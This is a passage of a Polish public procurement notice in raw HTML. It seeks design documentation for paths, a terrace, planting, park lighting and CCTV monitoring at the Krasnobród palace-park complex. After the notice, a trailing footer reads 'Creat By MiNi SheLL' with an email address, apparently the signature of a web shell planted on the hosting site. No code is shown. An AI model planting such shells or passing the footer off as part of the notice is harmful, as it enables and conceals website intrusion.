- uzgodnienia przyjętych rozwiązań projektowych z Wojewódzkim Urzędem Ochrony Zabytków w Lublinie Delegatura w Zamościu. 

Wszystkie projekty Wykonawca opracuje na mapie do celów projektowych którą uzyska własnym staraniem.  

Przy opisywaniu rozwiązań projektowych Wykonawca nie będzie wskazywał znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia lub gdy nie może opisać urządzenia lub materiału za pomocą dostatecznie dokładnych określeń. W przypadku takiego wskazania jak powyżej, we wszystkich dokumentach wchodzących w skład przedmiotu zamówienia, należy zawrzeć określenie lub równoważny, co w konsekwencji powoduje, że wymieniony konkretny produkt otrzymuje charakter jedynie przykładowy. W przypadku zastosowania rozwiązań równoważnych Wykonawca zobowiązany jest podać parametry równoważności.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 45<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>90.00</td></tr><tr><td>termin płatności</td><td>10.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zachowanie i udostępnienie najatrakcyjniejszych elementów dziedzictwa naturalnego w Krasnobrodzie   Opracowanie projektów  budowlano-wykonawczych rewitalizacji zabytkowego zespołu pałacowo-parkowego w Krasnobrodzie:  Projekt  budowy ścieżek spacerowych wraz z projektem budowy tarasu wypoczynkowego,  schodów terenowych i pochylni do wejścia na taras,  elementów małej architektury, bramy wejściowej do parku od ulicy Młyńskiej oraz tablicy informacyjnej (witacza) przy granicy północnej zespołu pałacowego.  Projekt nasadzenia zieleni (drzew, krzewów i kwiatów), w tym sadu i ogrodu sensorycznego.    <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Łączna powierzchnia obszaru objętego opracowaniem wynosi około 38000m2.
Ścieżki spacerowe do przebudowy będą projektowane z kostki brukowej klinkierowej. Istniejąca alejka do punktu widokowego będzie przewidziana do przebudowy z użyciem istniejącej cegły klinkierowej z której jest obecnie wykonana. Przebudowa alejki w zakresie przełożenia klinkieru jest projektowana na odcinku  o długości 130m. Łączna powierzchnia kostki klinkierowej do przełożenia wyniesie około 312m2.
Ścieżki spacerowe nowoprojektowane należy zaprojektować  z kostki betonowej imitującej  klinkier, ułożonej na podbudowie, na odcinku o długości około 470m. Szerokość ścieżek nie mniejsza niż 2m. Powierzchnia ścieżek z kostki klinkierowej wynosi około 720m2. Nawierzchnia w formie naturalnego kamienia, nieregularnie ułożonego, przerośniętego trawą, bez dodatkowej stabilizacji. Projektuje się ścieżki spacerowe z kamienia naturalnego na łącznej powierzchni około 100m2.
Budowa elementów małej architektury 

Na terenie zespołu pałacowo-parkowego należy zaprojektować:

- Ławki, drewniane na konstrukcji żeliwnej, modele katalogowe z oparciem, bez fundamentów w ilości 15 szt. ławek.
- Kosze na śmieci, drewniano żeliwne, modele katalogowe, bez fundamentów. ustawionych w ilości 10 szt. ławek.
- Tablicę informacyjną w formie "witacza" w ilości 1 szt. Tablica ma być zaprojektowana jako drewniana na fundamencie betonowym.
- Drogowskazy w ilości 2 sz. . Drogowskazy maja zostać zaprojektowane jako drewniane, mocowane na fundamentach betonowych.

Budowa  tarasu widokowego
Projekt  tarasu dwupoziomowego o wymiarach około 27mX5m każdy z poziomów, zlokalizowany na terenie działki o numerze 1228. Dwie platformy tarasu zaprojektowane w formie dwóch platform na dwóch poziomach połączonych schodami. Podłoga tarasu projektowana z desek kompozytowych na konstrukcji stalowej zabezpieczonej antykorozyjnie posadowionej na fundamentach betonowych. Taras zabezpieczony barierkami. Podłoga tarasu projektowana z desek kompozytowych.  Przy tarasie należy zaprojektować pomieszczenie gospodarcze na meble ogrodowe.  

Budowa bramy wejściowej na teren parku 

Projekt bramy o konstrukcji  drewnianej z zadaszeniem z drewna impregnowanego. Konstrukcja bramy mocowana na fundamencie betonowym.
Pokrycie dachu czterospadowego bramy projektowane z blachy płaskiej na rąbek stojący lub gont drewniany. Szerokość projektowanej bramy około 3 m,  wysokość bramy około 4m. Słupy bramy z ażurową drewnianą kratką pod pnącza.
Projekt tablicy informacyjnej w formie witacza. Tablica ma być dodatkowo podświetlona z wykorzystaniem energii odnawialnej. Tablica o konstrukcji drewnianej w kształcie zadaszonej tablicy. Pokrycie dachu czterospadowego projektowane z blachy płaskiej na rąbek stojący lub gont drewniany. Tablica wysoka. najniższe elementy poziome na wysokości powyżej 150cm. 
Drogowskazy
Projekt drogowskazów w ilości 2 szt. wykonanych z drewna. Drogowskazy mocowane na fundamentach betonowych.


Projekt nasadzenia zieleni (drzew, krzewów i kwiatów), w tym sadu i ogrodu sensorycznego.    

Na terenie sanatorium należy zaprojektować  nowe nasadzenia, w postaci nasadzeń uzupełniających a także nasadzeń nawiązujących do pierwotnie istniejących tu sadów. Wprowadzone zostaną wzdłuż drogi jako zieleń izolacyjna wysoka oraz wzdłuż ścieżek w miejscach gdzie został usunięty starodrzew. przy trasie widokowym posadzone zostaną drzewa sadownicze oraz ozdobne, natomiast wzdłuż ścieżki prowadzącej do projektowanej bramy projektowany jest ogród sensoryczny. Od bramy w ul. Młyńskiej do tarasu projektuje się ścieżkę przyrodniczo-edukacyjną. Proponowane gatunki zieleni wysokiej: lipy, platany, klony, tulipanowce, morwy.  Powierzchnia biologicznie czynna wynosi 3436m2.  
Punkt wypoczynkowy przy promenadzie spacerowej łączącej kładki nad nowym i starym korytem rzeki wieprz.
Projektowane wysokie drzewa oraz krzewy. Projektowane ławki parkowe w ilości 6 sztuk oraz kosze na śmieci w ilości 2 szt.    
Przedmiot zamówienia określony jako część zamówienia nr 2 wykonawca przekaże Zamawiającemu w następujących ilościach:
1. Projekty budowlane - 5 egzemplarzy.
(Projekt budowlany wraz z niezbędnymi uzgodnieniami ma umożliwiać uzyskanie pozwolenie na budowę, o którym mowa w ustawie Prawo budowlane oraz  spełniać wymagania Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012r. poz. 462).
2. Projekty wykonawcze - 5 egzemplarzy. 
(Projekty wykonawcze muszą uwzględniać wymagania określone w § 5 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jednolity Dz. U. z dnia 24 września 2013r. poz. 1129).

3. Kosztorysy inwestorskie - 2 egzemplarze
Kosztorysy inwestorskie będą sporządzone w oparciu o przepisy zawarte w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym  Dz. U. z 2004, Nr 130 poz.1389.
4. Kosztorysy ofertowe - 1 egzemplarz.
5. Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych - 1 egzemplarz.
Specyfikacje muszą uwzględniać wymagania określone w § 13 i 14 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jednolity Dz. U. z dnia 24 września 2013r. poz. 1129).
6.  Wersje cyfrowe dokumentacji - 2 płyty CD zawierające: 
- Projekt budowlany i projekt wykonawczy skanowany do PDF lub zapisany w formacie PDF). 
- Kosztorys inwestorski w wersji PDF.
- Kosztorysy ofertowe w wersji PDF.
- SSTWiORB w wersji WORD lub PDF.
 
Projektant opracowujący projekty budowlano-wykonawcze  zobowiązany jest do:
-  uzgodnienia projektów budowlano-wykonawczych z Dyrekcją Krasnobrodzkiego Parku Krajobrazowego.
- uzgodnienia przyjętych rozwiązań projektowych z Wojewódzkim Urzędem Ochrony Zabytków w Lublinie Delegatura w Zamościu. 

Wszystkie projekty Wykonawca opracuje na mapie do celów projektowych którą uzyska własnym staraniem.  

Przy opisywaniu rozwiązań projektowych Wykonawca nie będzie wskazywał znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia lub gdy nie może opisać urządzenia lub materiału za pomocą dostatecznie dokładnych określeń. W przypadku takiego wskazania jak powyżej, we wszystkich dokumentach wchodzących w skład przedmiotu zamówienia, należy zawrzeć określenie lub równoważny, co w konsekwencji powoduje, że wymieniony konkretny produkt otrzymuje charakter jedynie przykładowy. W przypadku zastosowania rozwiązań równoważnych Wykonawca zobowiązany jest podać parametry równoważności.
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7, 79421200-3,
                    71220000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 45<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>90.00</td></tr><tr><td>warunki płatności</td><td>10.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zachowanie i udostępnienie najatrakcyjniejszych elementów dziedzictwa naturalnego w Krasnobrodzie - opracowanie projektów budowlano-wykonawczych wykonania  oświetlenia parkowego promenady spacerowej  w  ulicy Młyńskiej, oświetlenie parku przy sanatorium rehabilitacyjnym w Krasnobrodzie. <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Projekt oświetlenia promenady spacerowej  przy ul. Młyńskiej.
 Długość projektowanego oświetlenia parkowego  około 800m. Oświetlenie parkowe wzdłuż ciągu pieszego. Ilość słupów oświetleniowych typu parkowego około  23 szt.
Projekt oświetlenia parku przy sanatorium rehabilitacyjnym w Krasnobrodzie.
Projektowanie  oświetlenia parkowego wysokiego i niskiego. Słupy parkowe oraz lampy oświetleniowe zasilane będą z nowoprojektowanej linii kablowej oświetlenia parkowego. Parametry techniczne oświetlenia w parku: Słupy oświetleniowe z oprawami LED wysokie około 4 szt. z oprawami LED. lampy oświetleniowe LRD niskie   około11 szt.
Projekt oświetlenia promenady spacerowej łączącej kładki nad nowym i starym korytem rzeki Wieprz w Krasnobrodzie.
Projektowanie odcinka oświetlenia parkowego wyposażonego w oprawy oświetleniowe LED wzdłuż promenady spacerowej łączącej kładki nad nowym i starym korytem rzeki Wieprz w Krasnobrodzie. Długość linii kablowych oświetlenia parkowego wyniesie około 135m. Ilość projektowanych słupów oświetleniowych typu parkowego z oprawami energooszczędnymi typu LED wyniesie około 4 sztuki.  


Projekt instalacji monitoringu.
Na dwóch wysokich lampach oświetleniowych w parku sanatoryjnym  przy ulicy Młyńskiej zamontowany zostanie system monitoringu zespołu pałacowego, umożliwiający bezpieczne użytkowanie terenu przez 24 godziny 7 dni w tygodniu. Kamery cyfrowe będą przekazywały zapis monitoringu na nagrywarkę która znajdowała się będzie w siedzibie Sanatorium Rehabilitacyjnego w Krasnobrodzie.

Przy opisywaniu rozwiązań projektowych Wykonawca nie będzie wskazywał znaków towarowych, patentów lub pochodzenia, chyba że jest to uzasadnione specyfiką przedmiotu zamówienia lub gdy nie może opisać urządzenia lub materiału za pomocą dostatecznie dokładnych określeń. W przypadku takiego wskazania jak powyżej, we wszystkich dokumentach wchodzących w skład przedmiotu zamówienia, należy zawrzeć określenie lub równoważny, co w konsekwencji powoduje, że wymieniony konkretny produkt otrzymuje charakter jedynie przykładowy. W przypadku zastosowania rozwiązań równoważnych Wykonawca zobowiązany jest podać parametry równoważności.

Przedmiot zamówienia określony jako część zamówienia nr 3 wykonawca przekaże Zamawiającemu w następujących ilościach:
1. Projekty budowlane - 5 egzemplarzy.
(Projekt budowlany wraz z niezbędnymi uzgodnieniami ma umożliwiać uzyskanie pozwolenie na budowę, o którym mowa w ustawie Prawo budowlane oraz  spełniać wymagania Rozporządzenia Ministra Transportu, Budownictwa i Gospodarki Morskiej z dnia 25 kwietnia 2012r. w sprawie szczegółowego zakresu i formy projektu budowlanego (Dz. U. z 2012r. poz. 462).
2. Projekty wykonawcze - 5 egzemplarzy. 
(Projekty wykonawcze muszą uwzględniać wymagania określone w § 5 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jednolity Dz. U. z dnia 24 września 2013r. poz. 1129).

3. Kosztorysy inwestorskie - 2 egzemplarze
Kosztorysy inwestorskie będą sporządzone w oparciu o przepisy zawarte w Rozporządzeniu Ministra Infrastruktury z dnia 18 maja 2004r. w sprawie określenia metod i podstaw sporządzenia kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów robót budowlanych określonych w programie funkcjonalno - użytkowym  Dz. U. z 2004, Nr 130 poz.1389.
4. Kosztorysy ofertowe - 1 egzemplarz.
5. Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych - 1 egzemplarz.
Specyfikacje muszą uwzględniać wymagania określone w § 13 i 14 rozporządzenia Ministra Infrastruktury z dnia 2 września 2004r. w sprawie szczegółowego zakresu i formy dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalno-użytkowego (tekst jednolity Dz. U. z dnia 24 września 2013r. poz. 1129).
6.  Wersje cyfrowe dokumentacji - 2 płyty CD zawierające: 
- Projekt budowlany i projekt wykonawczy skanowany do PDF lub zapisany w formacie PDF). 
- Kosztorys inwestorski w wersji PDF.
- Kosztorysy ofertowe w wersji PDF.
- SSTWiORB w wersji WORD lub PDF.
 
Projektant opracowujący projekty budowlano-wykonawcze  zobowiązany jest do:
-  uzgodnienia projektów budowlano-wykonawczych z Dyrekcją Krasnobrodzkiego Parku Krajobrazowego.
- uzgodnienia przyjętych rozwiązań projektowych z Wojewódzkim Urzędem Ochrony Zabytków w Lublinie Delegatura w Zamościu. 

Wszystkie projekty Wykonawca opracuje na mapie do celów projektowych którą uzyska własnym staraniem.  
<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>71320000-7<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  <br />
                  Waluta:
                  <br /><div style="padding-left: 20px"><br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w dniach: 45<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>90.00</td></tr><tr><td>termin płatności</td><td>10.00</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com